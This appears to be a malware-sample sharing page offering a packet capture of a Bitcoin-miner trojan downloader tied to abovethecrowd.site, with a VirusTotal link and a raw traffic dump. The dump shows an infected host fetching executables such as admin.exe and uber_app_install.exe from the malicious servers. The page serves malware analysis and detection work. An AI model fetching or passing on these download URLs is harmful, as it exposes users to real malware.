
abovethecrowd.site Bitcoin Miner Trojan Downloader Dropper Malware PCAP File Download Sample

Download Attachments

  • 1 pcap admin
    Date added: May 22, 2019 4:01 am Added by: admin File size: 1 MB Downloads: 26

https://www.virustotal.com/fr/file/d64503a8ef7cc902266dc0ff286cf02145931f2ce387010eb7e81c5a178766fa/analysis/

2019-05-21 22:58:08.538297 IP 10.1.10.162.53189 > 142.11.206.184.80: Flags [P.], seq 1:535, ack 1, win 16425, length 534: HTTP: GET /admin.exe HTTP/1.1
E..>a)@…&*
.
……..P^.`%…HP.@)#…GET /admin.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Range: bytes=214316-
Unless-Modified-Since: Wed, 15 May 2019 14:14:07 GMT
If-Range: "9aa00-588edc331c9c0"
Host: 142.11.206.184
Connection: Keep-Alive


.
…q+…Pi……… .{……………
2019-05-21 23:05:09.023374 IP 46.232.113.43.80 > 10.1.10.162.53171: Flags [S.], seq 2566676778, ack 1764681237, win 42340, options [mss 1460,nop,nop,sackOK,nop,wscale 12], length 0
E .4..@./…..q+
.
..P….a*i……d.r…………..
2019-05-21 23:05:09.023494 IP 10.1.10.162.53171 > 46.232.113.43.80: Flags [.], ack 1, win 16425, length 0
E..(M@..... . ...q+...Pi.....a+P.@)..........
2019-05-21 23:05:09.024219 IP 10.1.10.162.53171 > 46.232.113.43.80: Flags [P.], seq 1:454, ack 1, win 16425, length 453: HTTP: GET /download_app/uber_app_install.exe HTTP/1.1
E...N@…..
.
…q+…Pi…..a+P.@)h…GET /download_app/uber_app_install.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: abovethecrowd.site
Connection: Keep-Alive

2019-05-21 23:27:11.491216 IP 10.1.10.162.53251 > 209.197.3.15.80: Flags [P.], seq 415:835, ack 5890, win 16159, length 420: HTTP: GET /font-awesome/4.3.0/fonts/fontawesome-webfont.eot? HTTP/1.1
E…b.@…..
.
……..P ….d..P.?.qV..GET /font-awesome/4.3.0/fonts/fontawesome-webfont.eot? HTTP/1.1
Accept: */*
Referer: http://elememory.com/cgi-sys/suspendedpage.cgi
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: maxcdn.bootstrapcdn.com
Connection: Keep-Alive

2019-05-21 23:27:11.503111 IP 209.197.3.15.80 > 10.1.10.162.53251: Flags [.], ack 835, win 60, length 0

.
…8….Pdj…….. ..y…………..
2019-05-21 23:27:11.688817 IP 173.236.56.186.80 > 10.1.10.162.53252: Flags [S.], seq 2929576111, ack 1684704917, win 29200, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0
E .4..@.4.K[..8.
.
..P……dj….r……………..
2019-05-21 23:27:11.689034 IP 10.1.10.162.53252 > 173.236.56.186.80: Flags [.], ack 1, win 16425, length 0
E..(b.@…..
.
…8….Pdj……P.@)9………
2019-05-21 23:27:11.689248 IP 10.1.10.162.53252 > 173.236.56.186.80: Flags [P.], seq 1:292, ack 1, win 16425, length 291: HTTP: GET /favicon.ico HTTP/1.1
E..Kb.@….l
.
…8….Pdj……P.@)….GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: elememory.com
Connection: Keep-Alive

2019-05-21 23:27:11.742278 IP 173.236.56.186.80 > 10.1.10.162.53252: Flags [.], ack 292, win 237, length 0
E .(..@.4…..8.

.

Content-Type: text/html; charset=iso-8859-1


302 Found

2019-05-21 23:27:11.746919 IP 10.1.10.162.53252 > 173.236.56.186.80: Flags [P.], seq 292:597, ack 485, win 16304, length 305: HTTP: GET /cgi-sys/suspendedpage.cgi HTTP/1.1
E..Yb.@….]
.
…8….Pdj……P.?.^…GET /cgi-sys/suspendedpage.cgi HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: elememory.com
Connection: Keep-Alive
